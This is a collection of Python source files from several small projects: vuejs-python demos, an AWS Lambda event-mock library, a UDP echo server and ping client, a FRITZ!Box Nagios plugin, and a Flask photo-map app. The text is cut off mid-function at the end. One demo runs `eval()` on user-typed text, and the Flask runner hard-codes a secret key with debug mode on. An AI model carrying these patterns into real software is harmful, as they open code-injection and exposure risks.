        list.sort(self, **kwargs)
        self.raiseEvent('sorted')

    def reverse(self):
        list.reverse(self)
        self.raiseEvent('reversed')
|
twitwi/vuejs-python | examples/example-1.py | <gh_stars>10-100
import asyncio
import vuejspython
@vuejspython.model
class Comp:
    """Kitchen-sink demo: synchronized state, watch_/computed_ hooks, and
    sync/async methods invokable from the Vue frontend."""
    # define properties to forward to vue (synchronized state)
    suggestions = ['+1', 'ToTo']
    title = 'Test1'
    i = 42
    i2_withwatch = -1
    subtitle = 'very local'
    _v_novue = ['subtitle'] # property names to exclude from the synchronized state
    def __init__(self):
        self.i = 10
        # just for the example, starts a loop that increments every few seconds
        asyncio.ensure_future(self.demo_incr(1, 2))
    def watch_i(self, i):
        # Watcher: recompute the derived value whenever i changes.
        print("TEST: UPDATING i2_withwatch")
        self.i2_withwatch = i*i
    def computed_i2(self):
        print("TEST: COMPUTING i2")
        return self.i**2
    async def demo_incr(self, t, v):
        # Background loop: add v to i every t seconds.
        while True:
            await asyncio.sleep(t)
            self.i += v
    def meth1(self, v):
        print("TEST: COMMAND", v)
        self.subtitle = "Changed: "+v # will not trigger change as _novue
        if v == '+1':
            self.i += 1
    async def meth2(self, v):
        # Async method: returns the reversed string after a delay.
        await asyncio.sleep(1)
        return str(v[::-1])
    def meth3(self, v):
        return str(v[::-1])
    def clone(self, v):
        print("TEST: CLONE", type(self.suggestions))
        self.suggestions += [v]
vuejspython.start(Comp())
|
twitwi/vuejs-python | setup.py | <gh_stars>10-100
import setuptools
# Packaging metadata for the vuejspython distribution.
with open("README.md", "r") as fh:
    # Only the part of the README before the first '----' rule becomes
    # the PyPI long description.
    long_description = fh.read().split('----')[0]
setuptools.setup(
    name="vuejspython",
    version="0.2.6",
    author="<NAME>",
    author_email="<EMAIL>",
    description="Bridging vuejs and python (e.g., to leverage numpy)",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/twitwi/vuejs-python/",
    install_requires=['aiohttp', 'websockets'],
    packages=setuptools.find_packages(),
    package_data={
        # Ship the bundled frontend assets with the package.
        'vuejspython.static': ['*.js', '*.css']
    },
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
)
|
twitwi/vuejs-python | examples/example-4.py | <reponame>twitwi/vuejs-python
import asyncio
import numpy as np
import matplotlib.pyplot as plt
import os
from vuejspython import model, start
@model
class Comp:
    """On every change of `i`, render a hinge plot to an SVG file and expose
    its filename to the frontend."""
    # define properties to forward to vue (or not)
    i = 42
    fname = ""
    def __init__(self):
        self.i = 1
    def watch_i(self, i):
        # Regenerate the plot file whenever i changes.
        d = ",,ex4"
        if not os.path.exists(d):
            os.makedirs(d)
        fname = d+"/fname-"+str(self.i)+".svg"
        x = np.linspace(0, 100, 1000)
        # Hinge: max(x - i, 0).
        y = x-i
        y[y<0] = 0
        plt.figure()
        plt.grid()
        plt.plot(x, y)
        plt.savefig(fname)
        plt.close()
        # Assigning last so the frontend only sees the finished file.
        self.fname = fname
start(Comp())
|
twitwi/vuejs-python | vuejspython/static/__init__.py | <gh_stars>10-100
# to help the packager
|
twitwi/vuejs-python | examples/example-5.py |
import asyncio
from vuejspython import model, start
import numpy as np
import matplotlib.pyplot as plt
import io
import base64
@model
class Comp:
    """Contour-plot demo: render a nearest-neighbour score level set with
    matplotlib and ship it to the frontend as SVG and/or base64 PNG."""
    # define properties to forward to vue (or not)
    gamma = 1.0
    svg = ""
    png = ""
    use_svg = True
    use_png = True
    show_points = True
    show_nn = True
    def __init__(self):
        self.draw_dataset()
    def draw_dataset(self):
        # Grid axes, two fixed "plus" anchors, a random crescent of "minus"
        # samples, and the resulting distance-ratio image `im`.
        self.y = np.linspace(-0.87, 0.87, 103)[None, :, None]
        self.x = np.linspace(-1.3, 1.3, 91)[:, None, None]
        self.xp = np.array([0, 0.75])[None,None,:]
        self.yp = np.array([0, 0])[None,None,:]
        rangle = np.random.uniform(0, np.pi*4/3, (1, 1, 300))
        rradius = np.random.uniform(1, 1.7, rangle.shape)
        self.xm = rradius * np.cos(rangle)
        self.ym = rradius*4/6 * np.sin(rangle)
        d1m = np.min( ((self.x-self.xm)**2 + (self.y-self.ym)**2)**0.5, axis=2)
        d1p = np.min( ((self.x-self.xp)**2 + (self.y-self.yp)**2)**0.5, axis=2)
        s = d1m/(d1p+.0001)
        self.im = np.transpose(s)
    # Display toggles just trigger a re-render at the current gamma.
    def watch_show_points(self, _): self.watch_gamma(self.gamma)
    def watch_show_nn(self, _): self.watch_gamma(self.gamma)
    def watch_gamma(self, ga):
        x = self.x
        y = self.y
        im = self.im
        xp, yp = self.xp, self.yp
        xm, ym = self.xm, self.ym
        plt.figure()
        if self.show_nn:
            CS = plt.contour(im, extent=[x.min(), x.max(), y.min(), y.max()], levels=[1], colors=['k'], linewidths=[3])
        CS = plt.contour(im, extent=[x.min(), x.max(), y.min(), y.max()], levels=[ga])
        ###plt.clabel(CS)
        plt.xlim([x.min(), x.max()])
        plt.ylim([y.min(), y.max()])
        if self.show_points:
            plt.scatter(xp, yp, marker='+')
            plt.scatter(xm, ym, marker='.')
        plt.xticks([]) ; plt.yticks([])
        if self.use_png:
            # Render to PNG in memory and expose it base64-encoded.
            b = io.BytesIO()
            plt.savefig(b, format="png")
            self.png = base64.b64encode(b.getvalue()).decode()
            b.close()
        if self.use_svg:
            # Render to SVG in memory and expose the raw markup.
            s = io.StringIO()
            plt.savefig(s, format="svg")
            self.svg = s.getvalue()
            s.close()
        plt.close()
start(Comp())
|
twitwi/vuejs-python | examples/example-2.py |
import asyncio
import vuejspython
import numpy as np
@vuejspython.model # this annotation could start the things automatically (if there is a single model anyway)
class Comp:
    """Shapelet-importance explorer: several alternative importance scores
    for the currently selected class, plus a shapelet preview image."""
    # define properties to forward to vue (or not)
    currentClass = 0
    currentShapelet = 0
    currentImage = ''
    folder, groups, scale = 'unzip-nouveau', [30, 30, 30], 100
    #folder, groups, scale = 'epoch8000', [40, 40, 40], 1
    _v_nobroadcast = ['wa']
    def __init__(self):
        # can add local properties here (to avoid having to fill _novue)
        self.weight_dense = np.genfromtxt(self.folder+'/weight_dense.txt')
        self.activations = np.hstack([
            np.genfromtxt(self.folder+'/mp_shapelet_group_'+str(i)+'.txt') for i in range(len(self.groups))
        ])
    def computed_wa(self):
        # Per-timeseries, per-shapelet, per-class weighted activations.
        a = self.activations # ts, sh
        w = self.weight_dense # sh, cl
        wa = a[:,:,None] * w[None, :, :] # ts, sh, cl
        return wa
    def computed_importance(self):
        # Mean margin of the current class over the average of the others.
        cc = self.currentClass
        n_c = self.weight_dense.shape[1]
        wa = self.wa
        mean_others = wa[:, :, np.arange(n_c) != cc].mean(axis=2)
        return np.mean(wa[:,:,cc] - mean_others, axis=0) * self.scale
    def computed_importance2(self):
        # Mean margin over the strongest competing class.
        cc = self.currentClass
        n_c = self.weight_dense.shape[1]
        wa = self.wa
        max_others = wa[:, :, np.arange(n_c) != cc].max(axis=2)
        return np.mean(wa[:,:,cc] - max_others, axis=0) * self.scale
    def computed_importance3(self):
        # Leave-one-shapelet-out drop in the softmax probability of the class.
        cc = self.currentClass
        n_c = self.weight_dense.shape[1]
        n_sh = self.weight_dense.shape[0]
        wa = self.wa
        cla = wa.sum(axis=1) # ts, cl
        clp = np.exp(cla) / np.sum(np.exp(cla), axis=1, keepdims=True) # ts, cl
        def diffp(sh):
            no_cla = wa[:, np.arange(n_sh) != sh, :].sum(axis=1)
            no_cla = np.exp(no_cla)
            no_clp = no_cla / np.sum(no_cla, axis=1, keepdims=True)
            #d = clp[:, :] - no_clp[:, :]
            d = clp[:, cc] - no_clp[:, cc]
            #d[d<0.2] = 0
            d[d<0.01] = 0
            return np.mean(d)
        #self.importance3 = [diffp(sh) * 100000 for sh in range(n_sh)]
        imp3 = np.array([diffp(sh) for sh in range(n_sh)])
        imp3 *= 200/np.max(imp3)
        return imp3
    def watch_currentShapelet(self, cs):
        # up current image: map the flat shapelet index to (group, offset).
        g = 0
        while cs >= self.groups[g]:
            cs -= self.groups[g]
            g += 1
        self.currentImage = f'{self.folder}/plot/group{g}_shapelet{cs}.png'
m = Comp()
# NOTE(review): `m` is unused and start() below builds a second instance —
# confirm whether start(m) was intended.
vuejspython.start(Comp(), py_port=4242)
|
twitwi/vuejs-python | examples/example-7.py | <gh_stars>10-100
from vuejspython import model, start
@model
class Comp:
    """Interactive slice-expression demo: evaluates `input_expr` to a list
    and applies the user's `slice_expr` to a tagged copy of it."""
    # State mirrored into the Vue frontend.
    i_name = 'l'
    o_name = 's'
    slice_expr = '5:15'
    is_error = False
    input_expr = str(list(range(40,60)))
    def __init__(self):
        pass
    def computed_input(self):
        """Evaluate input_expr; anything that is not a list becomes []."""
        # NOTE(review): eval() on user-typed text — acceptable for a local
        # demo, never for untrusted input.
        try:
            res = eval(self.input_expr)
            if type(res) is list: return res
            return []
        except Exception:
            return []
    def computed_taginput(self):
        """Tag each input value with its index, e.g. '42#005'."""
        return ['%s#%03d'%(str(v), i) for i,v in enumerate(self.input)]
    def computed_tagoutput(self):
        """Apply the user's slice expression to the tagged list.

        The original mutated the dict returned by locals() and relied on a
        later eval() seeing the additions, which CPython does not guarantee;
        an explicit namespace is passed to eval() instead.
        """
        try:
            namespace = {
                self.i_name: self.input,
                '___' + self.i_name: self.taginput,
            }
            res = eval('___%s[%s]'%(self.i_name, self.slice_expr), {}, namespace)
            self.is_error = False
            return res
        except Exception as e:
            self.is_error = True
            self.error_message = str(e)
            return []
start(Comp())
|
twitwi/vuejs-python | examples/example-8.py | <reponame>twitwi/vuejs-python
import asyncio
from vuejspython import model, start
@model
class Comp:
    """Counter with a squared computed property and an incr command."""
    # define properties to forward to vue (or not)
    i = 42
    def __init__(self):
        self.i = 1
    def computed_sqrd(self):
        return self.i ** 2
    def incr(self, d):
        self.i += d
@model
class Dummy:
    """Second independent model, to show several components side by side."""
    i = 3
    def incr(self, d):
        self.i += d
@model
class Square:
    """Component taking `val` as a Vue prop and exposing its square."""
    props = ['val'] # python defined props
    val = 0 # need a value for typing reasons, maybe this will change
    # TODO? consider a more vuejs syntax like: props = {'val': {'default': 0}}
    def computed_square(self):
        return self.val ** 2
start(Comp())
|
Abir-H/serverless-event-mocks-python | serverless_event_mocks/__init__.py | <filename>serverless_event_mocks/__init__.py
from serverless_event_mocks.event import create_event
|
Abir-H/serverless-event-mocks-python | setup.py | import setuptools
# Packaging metadata for the serverless-event-mocks distribution.
with open("README.md", "r") as fh:
    long_description = fh.read()
setuptools.setup(
    name='serverless-event-mocks',
    packages=['serverless_event_mocks'],
    version='0.0.7',
    license='MIT',
    description='A small Python library that includes details mocks of AWS Lambda event sources.',
    long_description=long_description,
    long_description_content_type="text/markdown",
    author='<NAME>',
    author_email='<EMAIL>',
    url='https://github.com/abirhoss/serverless-event-mocks',
    download_url='https://github.com/abirhoss/serverless-event-mocks/archive/v0.0.7.tar.gz',
    keywords=['serverless', 'serverless-framework', 'unittest', 'mock', 'events', 'aws-lambda'],
    classifiers=[
        "Development Status :: 4 - Beta",
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    # Ship the JSON event templates alongside the code.
    include_package_data=True
)
|
Abir-H/serverless-event-mocks-python | serverless_event_mocks/tests/test_event.py | <gh_stars>1-10
from unittest import TestCase
from serverless_event_mocks.event import create_event
class TestEvent(TestCase):
    """Unit tests for serverless_event_mocks.event.create_event."""
    def test_create_event_aws_api_gateway(self):
        # Arrange
        provider = 'aws'
        event_type = 'api_gateway'
        event_payload = {
            "body": {
                "first_name": "Sam",
                "last_name": "Smith"
            }
        }
        # Act
        event = create_event(provider, event_type, event_payload)
        # Assert: the payload was merged into the dict-shaped template.
        self.assertTrue(isinstance(event, dict))
        self.assertTrue(event.get('body'))
|
Abir-H/serverless-event-mocks-python | serverless_event_mocks/event.py | import json
from pathlib import Path
VALID_PROVIDERS = ['aws']
VALID_EVENT_TYPES = ['api_gateway']
EVENT_TEMPLATES_EXT = 'json'
EVENT_TEMPLATES_DIR = Path(__file__).resolve().parent / 'event_templates'


def create_event(provider: str, event_type: str, event_payload: dict) -> dict:
    """Create a mock serverless event.

    Loads the bundled JSON template for (provider, event_type) and overlays
    *event_payload* on top of it.  Raises KeyError for an unknown provider
    or event type, and TypeError when the payload is not a dict.
    """
    if not _validate_provider(provider):
        raise KeyError(f"Invalid provider '{provider}'. Valid providers: {VALID_PROVIDERS}")
    if not _validate_event_type(event_type):
        raise KeyError(f"Invalid event_type '{event_type}'. Valid event types: {VALID_EVENT_TYPES}")
    if not _validate_event_payload(event_payload):
        raise TypeError(f"Invalid event_payload type. Must be of '{dict}', '{type(event_payload)}' given")
    # payload keys win over template keys
    merged = dict(_load_event_template(provider, event_type))
    merged.update(event_payload)
    return merged


def _load_event_template(provider: str, event_type: str) -> dict:
    """Read and parse the JSON template bundled for this provider/event type."""
    template = EVENT_TEMPLATES_DIR / provider / f"{event_type}.{EVENT_TEMPLATES_EXT}"
    return json.loads(template.read_text())


def _validate_provider(provider: str) -> bool:
    """True when *provider* is one of the supported cloud providers."""
    return provider in VALID_PROVIDERS


def _validate_event_type(event_type: str) -> bool:
    """True when *event_type* is a supported event source."""
    return event_type in VALID_EVENT_TYPES


def _validate_event_payload(event_payload: dict) -> bool:
    """True when the payload override is a plain dict."""
    return isinstance(event_payload, dict)
|
mhmddpkts/UDP-Socket | Receiver.py | import socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # create a UDP (datagram) socket
server_socket.bind(('', 25400)) # listen on port 25400 on every interface
while True: # echo server: serve datagrams forever
    message, address = server_socket.recvfrom(1024) # receive one datagram (max 1024 bytes)
    print("Ip :",address[0]," Client Portu:",address[1]) # log the sender's IP and port
    server_socket.sendto(message, address) # echo the payload back to the client
|
mhmddpkts/UDP-Socket | Sender.py | <reponame>mhmddpkts/UDP-Socket
#****** SENDER *****
# UDP ping client: sends six packets to the echo server and measures RTT.
import time
import socket
IP = input("ENTER IP : ") # read the target IP address
adress = (IP, 25400) # destination address (variable keeps the original 'adress' spelling)
PacketCounter = 0 # total packets sent
PacketLossCounter = 0 # packets that timed out
client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP socket
client_socket.settimeout(2.0) # wait at most 2 seconds for each reply
for pings in range(1, 7): # send six ping packets
    message = str(pings)+". Ping Message" # build the payload
    message = message.encode() # encode to bytes
    start = time.time() # timestamp before sending
    client_socket.sendto(message, adress) # send the packet
    PacketCounter = PacketCounter+1 # count it
    try:
        data, server = client_socket.recvfrom(1024) # wait for the echo
        end = time.time() # timestamp of the reply
        elapsed = end - start # round-trip time
        print(f'+ Data : {data} - Size : {len(data)}byte - Ping : {pings} - Time : {elapsed}sn State : OK')# print packet details
    except socket.timeout: # no reply within the timeout
        PacketLossCounter = PacketLossCounter+1 # count the loss
        print("- Ping ", pings, ': REQUEST TIMED OUT - State : Failed') # report which ping timed out
# summary output
print("\n\n\t\t\t\t\t\t\t\t\t\t|*** RESULT *** |\n")
print(f" IP : [{IP}] - Total Packet Count : [{PacketCounter}] - Arrived Packet Count: [{PacketCounter-PacketLossCounter}]"
      f" - Packet Loss Count : [{PacketLossCounter}]")
|
cicerops/fritznagios | fritznagios.py | <filename>fritznagios.py
"""
fritznagios.py
Module for Nagios/Icinga2 to query the FritzBox API for available services and actions.
License: MIT (https://opensource.org/licenses/MIT)
Author: <NAME>
Source: https://github.com/cicerops/fritznagios
This module depends on the FritzConnection module.
Source: https://github.com/kbr/fritzconnection
"""
import argparse
import datetime
import ipaddress
import math
import os
from fritzconnection.core.exceptions import FritzActionError, FritzServiceError
from fritzconnection.core.fritzconnection import FRITZ_IP_ADDRESS, FRITZ_TCP_PORT
from fritzconnection.lib.fritzstatus import FritzStatus
class Nagios:
    """Nagios/Icinga check command for FRITZ!Box routers.

    Each mode ("ip", "uptime", "bytes", "bitrate") prints a single status
    line starting with the Nagios state word (OK/WARNING/CRITICAL).
    """
    def __init__(self):
        # FritzStatus connection is opened lazily by set_fs()
        self.fs = None
        self.modes = ["ip", "uptime", "bytes", "bitrate"]
        self.default_mode = self.modes[0]
        self.args = self.get_cli_arguments()
        self.state = "OK"
    def set_fs(self):
        """Open the FritzStatus connection using the parsed CLI credentials."""
        self.fs = self.get_instance(FritzStatus, self.args)
    def main(self):
        """Validate mode-specific options, connect, and dispatch to the mode method."""
        if self.args.mode == "uptime":
            if not self.args.password:
                print("Exit: -p password required.")
                exit()
            # NOTE(review): -w/-c are coerced to int only for this mode; the
            # other modes pass them to set_state() unconverted - confirm.
            if self.args.warning:
                try:
                    self.args.warning = int(self.args.warning)
                # NOTE(review): bare except also swallows SystemExit/KeyboardInterrupt
                except:
                    print("Exit: -w Warning level as int required.")
                    exit()
            if self.args.critical:
                try:
                    self.args.critical = int(self.args.critical)
                except:
                    print("Error: -c Critical level as int required.")
                    exit()
        if self.args.mode not in self.modes:
            print("Exit: -m Requires something like %s" % self.modes)
        else:
            self.set_fs()
            if self.args.mode in self.modes:
                # dispatch: the mode name doubles as the method name
                fun = getattr(Nagios, self.args.mode)
                fun(self)
    def uptime(self):
        """Report device and connection uptime as H:MM:SS strings."""
        device_uptime = self.get_information("device_uptime")
        connection_uptime = self.get_information("connection_uptime")
        device_uptime = str(datetime.timedelta(seconds=device_uptime))
        connection_uptime = str(datetime.timedelta(seconds=connection_uptime))
        print(self.state + " - DeviceUptime: %s ConnectionUptime: %s" % (device_uptime, connection_uptime))
    def bytes(self):
        """Report sent/received byte counters scaled to KB/MB/GB."""
        bytes_sent = self.get_information("bytes_sent")
        bytes_received = self.get_information("bytes_received")
        bytes_sent = bytes_sent / 1000
        bytes_received = bytes_received / 1000
        unit_s = "KB"
        unit_r = "KB"
        # NOTE(review): divides by 1000 but switches units at 1024 - confirm
        # whether decimal or binary prefixes were intended.
        if bytes_sent > 1024:
            bytes_sent = round(bytes_sent / 1000, 2)
            unit_s = "MB"
        if bytes_sent > 1024:
            bytes_sent = round(bytes_sent / 1000, 2)
            unit_s = "GB"
        if bytes_received > 1024:
            bytes_received = round(bytes_received / 1000, 2)
            unit_r = "MB"
        if bytes_received > 1024:
            bytes_received = round(bytes_received / 1000, 2)
            unit_r = "GB"
        print(self.state + " - received: %s" % bytes_received + unit_r + " sent: %s" % bytes_sent + unit_s)
    def ip(self):
        """Report external IPv4/IPv6; state derives from how many addresses exist."""
        counter = 0
        ipv4 = False
        ipv6 = False
        ipv4 = self.get_information("external_ip")
        ipv6 = self.get_information("external_ipv6")
        if ipv4:
            ipv4 = ipaddress.ip_address(ipv4)
            counter += 1
        if ipv6:
            ipv6 = ipaddress.ip_address(ipv6)
            counter += 1
        self.set_state(counter)
        if ipv4 and ipv6:
            print(self.state + " - IPv4: %s, IPv6: %s" % (ipv4, ipv6))
        elif ipv4:
            print(self.state + " - IPv4: %s" % ipv4)
        elif ipv6:
            print(self.state + " - IPv6: %s" % ipv6)
        else:
            print(self.state + " - No IP Address.")
    def bitrate(self):
        """Report up/downlink bit rates; state keys off the downlink in Mbit/s."""
        max_bit_rate = self.get_information("max_bit_rate")
        str_max_bit_rate = self.get_information("str_max_bit_rate")
        value = int(math.ceil(float(max_bit_rate[1] / 1000000)))
        self.set_state(value)
        print(self.state + " - DownlinkBitRate: %s UplinkBitRate: %s" % (str_max_bit_rate[1], str_max_bit_rate[0]))
    def get_information(self, attribute):
        """Read one FritzStatus attribute; returns an error string when unsupported."""
        try:
            information = getattr(self.fs, attribute)
        except (FritzServiceError, FritzActionError):
            information = f'unsupported attribute "{attribute}"'
        return information
    def set_state(self, value):
        """Degrade the state when *value* falls below the -w / -c thresholds."""
        # NOTE(review): outside uptime mode warning/critical may still be the
        # argparse defaults (False/True) or raw strings, so these comparisons
        # can raise TypeError on Python 3 - confirm.
        if self.args.warning > value:
            self.state = "WARNING"
        if self.args.critical > value:
            self.state = "CRITICAL"
    def get_instance(self, cls, args):
        """Instantiate a fritzconnection helper class from the CLI arguments."""
        return cls(
            address=args.address,
            port=args.port,
            user=args.username,
            password=args.password,
            use_tls=args.encrypt,
        )
    def get_cli_arguments(self):
        """Define and parse the command-line interface."""
        parser = argparse.ArgumentParser()
        parser.add_argument(
            "-i",
            "--ip-address",
            nargs="?",
            default=FRITZ_IP_ADDRESS,
            const=None,
            dest="address",
            help="Specify ip-address of the FritzBox to connect to." "Default: %s" % FRITZ_IP_ADDRESS,
        )
        parser.add_argument(
            "--port",
            nargs="?",
            default=None,
            const=None,
            help="Port of the FritzBox to connect to. " "Default: %s" % FRITZ_TCP_PORT,
        )
        parser.add_argument(
            "-u",
            "--username",
            nargs="?",
            default=os.getenv("FRITZ_USERNAME", None),
            help="Fritzbox authentication username",
        )
        parser.add_argument(
            "-p",
            "--password",
            nargs="?",
            default=os.getenv("FRITZ_PASSWORD", None),
            help="Fritzbox authentication password",
        )
        parser.add_argument("-e", "--encrypt", nargs="?", default=False, const=True, help="use secure connection")
        parser.add_argument(
            "-m",
            "--mode",
            nargs="?",
            default=self.default_mode,
            const=True,
            help="set a check mode: %s" % self.modes + " default: %s" % self.default_mode,
        )
        parser.add_argument("-w", "--warning", nargs="?", default=False, const=True, help="set warning level")
        parser.add_argument("-c", "--critical", nargs="?", default=False, const=True, help="set critical level")
        args = parser.parse_args()
        return args
def main():
    """Console entry point: build the checker and run the selected mode."""
    Nagios().main()


if __name__ == "__main__":
    main()
|
cicerops/fritznagios | setup.py | <reponame>cicerops/fritznagios
import os
from setuptools import setup
def read(path):
    """Return the text of *path*, resolved relative to this setup.py."""
    full_path = os.path.join(os.path.dirname(__file__), path)
    with open(full_path) as handle:
        return handle.read()
# PyPI metadata; the long description is the README verbatim.
long_description = read("README.md")
setup(
    name="fritznagios",
    version="0.1.3",
    url="https://github.com/cicerops/fritznagios",
    author="<NAME>",
    author_email="<EMAIL>",
    description="Nagios/Icinga monitoring check program for FRITZ!Box devices",
    long_description=long_description,
    long_description_content_type="text/markdown",
    platforms=["any"],
    license="MIT",
    keywords="FRITZ!Box, AVM, fritzbox, fritz, Nagios, Icinga, monitoring, TR-064, UPnP",
    py_modules=["fritznagios"],
    entry_points={"console_scripts": ["fritznagios = fritznagios:main"]},
    python_requires=">=3.4",
    install_requires=["fritzconnection>=1,<2"],
    classifiers=[
        "Development Status :: 4 - Beta",
        "License :: OSI Approved :: MIT License",
        "Natural Language :: English",
        "Operating System :: OS Independent",
        "Environment :: Console",
        "Programming Language :: Python",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: Implementation :: CPython",
        "Programming Language :: Python :: Implementation :: PyPy",
        "Intended Audience :: Developers",
        "Intended Audience :: Education",
        "Intended Audience :: Information Technology",
        "Intended Audience :: Science/Research",
        "Intended Audience :: System Administrators",
        "Topic :: Communications",
        "Topic :: Database",
        "Topic :: Internet",
        "Topic :: Scientific/Engineering :: Information Analysis",
        "Topic :: Scientific/Engineering :: Interface Engine/Protocol Translator",
        "Topic :: Software Development :: Libraries",
        "Topic :: System :: Archiving",
        "Topic :: System :: Logging",
        "Topic :: System :: Monitoring",
        "Topic :: System :: Systems Administration",
        "Topic :: Text Processing",
        "Topic :: Utilities",
    ],
)
|
cacahootie/geophoto | geophoto/views.py | <reponame>cacahootie/geophoto
import os
from functools import wraps
from flask import Flask, jsonify, render_template, request, abort
from geophoto import app, models, oembed
basedir = os.path.dirname(os.path.abspath(__file__))
# NOTE(review): index_path is not referenced anywhere in this module - possibly dead.
index_path = os.path.join(basedir,'static','index.html')
def spa(vfunc):
    """Single-page-app helper: answer with JSON only when ?format=json is
    requested, otherwise serve the SPA shell so the frontend can route."""
    @wraps(vfunc)
    def wrapper(*args, **kwargs):
        wants_json = request.args.get('format') == 'json'
        if wants_json:
            return vfunc(*args, **kwargs)
        return render_template('index.html')
    return wrapper
@app.route("/")
def index():
    """Serve the single-page-app shell."""
    return render_template('index.html')
@app.route("/photos")
@spa
def photos():
    """JSON list of geocoded photos (id, lat, lng, src)."""
    return jsonify(models.photos())
@app.route("/articles")
@spa
def articles():
    """JSON list of article metadata from the manifest."""
    return jsonify(models.articles())
@app.route("/articles/<key>")
@spa
def article(key):
    """One article's metadata plus its rendered body."""
    return jsonify(models.article(key))
@app.route("/tags/<id>", methods=["GET",])
@spa
def tags(id):
    """Tags attached to photo *id*."""
    return jsonify(models.tags(id))
@app.route("/services/oembed/", methods=["GET",])
def oembed_service():
    """oEmbed endpoint: return the embed payload as JSON (default) or HTML.

    NOTE(review): an unsupported format currently yields HTTP 500; the
    oEmbed spec suggests 501 Not Implemented - confirm before changing.
    """
    fmt = request.args.get("format")
    if fmt is None or fmt == 'json':
        return jsonify(oembed.oembed(request.args.get('url')))
    elif fmt == 'html':
        return oembed.oembed(request.args.get('url'))
    abort(500)
@app.route("/tags/<id>", methods=["POST",])
@spa
def add_tags(id):
    """Attach posted tags to photo *id*; 409 when a tag already exists."""
    try:
        return jsonify(models.add_tags(id, request.get_json()))
    except ValueError:
        abort(409)
|
cacahootie/geophoto | run.py | <gh_stars>0
from geophoto import app
if __name__ == "__main__":
    # NOTE(review): hard-coded secret key and debug=True - development only,
    # do not deploy this entry point as-is.
    app.secret_key = 'super secret key'
    app.run(
        host='0.0.0.0',
        port=8008,
        debug=True
    )
|
cacahootie/geophoto | geophoto/models.py |
import codecs
from os import listdir, getcwd
from os.path import isfile, join
from itertools import repeat
import json
import hashlib
import subprocess
import psycopg2
import psycopg2.extras
import exifread
import markdown
# Filesystem layout: photos arrive in img_in_path, auto-oriented copies live
# in img_path, and are served from web_path.  Articles are markdown files.
img_path = './geophoto/static/img/geocoded'
img_in_path = './geophoto/static/img/geocoded_in'
article_path = './geophoto/articles'
web_path = '/static/img/geocoded/'
# NOTE(review): hard-coded local DB name; autocommit makes every statement
# commit immediately (no transactional batching).
conn = psycopg2.connect("dbname='relately'")
conn.autocommit = True
def dms_to_decimal(value, hemi):
    """Convert an EXIF GPS DMS string like "[51, 30, 12/1]" to decimal degrees.

    The seconds component may be a rational "num/den" pair or a plain
    number.  A 'W' or 'S' hemisphere flips the sign.
    """
    parts = str(value).replace('[', '').replace(']', '').replace(' ', '').split(',')
    frac = parts[2].split('/')
    try:
        seconds = float(frac[0]) / float(frac[1])
    except IndexError:
        # seconds was a plain number, not a rational pair
        seconds = float(parts[2])
    degrees = float(parts[0]) + float(parts[1]) / 60 + seconds / 3600
    if str(hemi) in ('W', 'S'):
        degrees *= -1.0
    return degrees
def _unprocessed_photos():
    """Names of files sitting in the incoming (not yet oriented) directory."""
    return {entry for entry in listdir(img_in_path) if isfile(join(img_in_path, entry))}
def _processed_photos():
    """Names of files already auto-oriented into the processed directory."""
    return {entry for entry in listdir(img_path) if isfile(join(img_path, entry))}
def reorient(files):
    """Auto-rotate each incoming photo according to its EXIF orientation.

    Writes the corrected copy into the processed directory via ImageMagick's
    mogrify.  The command is passed as an argument list (shell=False) so a
    crafted filename can no longer inject shell commands.
    """
    for f in files:
        subprocess.call([
            "mogrify",
            "-path", "./geophoto/static/img/geocoded",
            "-auto-orient",
            "./geophoto/static/img/geocoded_in/{}".format(f),
        ])
def get_photo_metadata(files):
    """Extract GPS coordinates from each image's EXIF data.

    Returns a generator of dicts {src, lat, lng, id} for images carrying a
    full GPS tag set; images without GPS data are skipped.
    """
    results = []
    for i, fn in enumerate(files):
        if i % 100 == 0:
            print("Extracting metadata for row {}".format(i))
        # EXIF parsing needs a binary file handle; previously 'rb' was
        # mistakenly passed to process_file() (as its stop_tag argument)
        # instead of to open(), and the handle was never closed.
        with open(join(img_path, fn), 'rb') as fh:
            tags = exifread.process_file(fh)
        try:
            results.append({
                "src": web_path + fn,
                "lat": dms_to_decimal(tags['GPS GPSLatitude'], tags['GPS GPSLatitudeRef']),
                "lng": dms_to_decimal(tags['GPS GPSLongitude'], tags['GPS GPSLongitudeRef']),
                "id": md5(fn)
            })
        except KeyError:
            # image has no (complete) GPS block - skip it
            pass
    rows = (
        x for x in results
        if isinstance(x['lat'], float)
        and isinstance(x['lng'], float)
    )
    return rows
def insert_photo_metadata(rows):
    """Bulk-insert photo rows into geophoto.items, skipping duplicates.

    Rows are dicts with id/lat/lng/src keys (see get_photo_metadata).
    """
    with conn.cursor() as cur:
        for i, row in enumerate(rows):
            if i % 100 == 0:
                print "Processing %i row" % i
            try:
                cur.execute("""
                    insert into geophoto.items(id, lat, lng, src, itemtype)
                    VALUES (%(id)s, %(lat)s, %(lng)s, %(src)s, 'photo')
                    ON CONFLICT DO NOTHING
                """, row)
            except psycopg2.IntegrityError:
                # log the offending row (Python 2 print statement)
                print row
def process_photos():
    """Orient newly arrived photos, then extract and store their GPS metadata.

    Fixes two defects: the emptiness test used ``len(files) < 0`` (never
    true), and ``reorient`` was called without its ``files`` argument.
    Returns the generator of metadata rows that were inserted.
    """
    files = _unprocessed_photos() - _processed_photos()
    if files:
        reorient(files)
    else:
        # nothing new - reprocess everything already oriented
        files = _processed_photos()
    rows = get_photo_metadata(files)
    insert_photo_metadata(rows)
    return rows
def md5(fname):
    """Hex MD5 digest of a processed image file, streamed in 4 KiB chunks."""
    digest = hashlib.md5()
    with open(join(img_path, fname), "rb") as fh:
        while True:
            chunk = fh.read(4096)
            if not chunk:
                break
            digest.update(chunk)
    return digest.hexdigest()
def photos():
    """All geocoded photos as {"results": [{id, lat, lng, src}, ...]}."""
    with conn.cursor(cursor_factory=psycopg2.extras.DictCursor) as cur:
        cur.execute("""
            select id, lat, lng, src from geophoto.items
            where itemtype = 'photo'
        """)
        return {"results": [dict(x) for x in cur] }
def articles():
    """List article metadata from the articles/index.json manifest."""
    articles = []
    with open(join(article_path, 'index.json'), 'rb') as f:
        article_index = json.load(f)
    for key, item in article_index.items():
